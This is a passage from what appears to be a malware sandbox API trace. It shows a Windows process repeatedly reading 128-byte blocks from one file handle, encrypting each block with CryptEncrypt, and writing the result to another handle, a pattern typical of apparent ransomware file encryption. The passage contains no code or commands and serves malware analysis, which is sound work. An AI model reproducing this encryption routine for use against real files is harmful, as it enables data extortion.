lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.666] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.666] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.666] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.666] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.666] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.666] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.666] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.667] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.667] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.667] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.667] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.667] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.667] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.667] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.668] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.668] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.668] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.668] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.668] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.668] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.668] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.669] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.669] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.669] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.669] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.669] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.669] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.669] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.670] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.670] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.670] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.670] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.670] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.670] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.670] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.671] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.671] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.671] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.671] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.671] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.671] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, 